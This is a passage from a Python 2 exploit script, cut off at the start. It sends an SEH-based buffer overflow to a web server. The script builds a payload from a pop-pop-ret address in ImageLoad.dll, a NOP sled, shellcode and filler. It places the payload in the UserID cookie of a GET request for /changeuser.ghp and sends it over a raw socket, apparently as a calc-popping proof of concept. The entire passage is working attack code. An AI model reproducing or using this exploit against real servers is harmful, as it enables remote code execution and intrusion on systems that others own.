SEH jump craftedreq += struct.pack("<I", 0x10017743) # pop commands from ImageLoad.dll craftedreq += "\x90"*40 # NOPer craftedreq += shellcode craftedreq += "C"*50 # filler httpreq = ( "GET /changeuser.ghp HTTP/1.1\r\n" "User-Agent: Mozilla/4.0\r\n" "Host:" + host + ":" + str(port) + "\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: en-us\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://" + host + "/\r\n" "Cookie: SESSIONID=6771; UserID=" + craftedreq + "; PassWD=;\r\n" "Conection: Keep-Alive\r\n\r\n" ) print "[+]Sending the Calc...." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) s.close()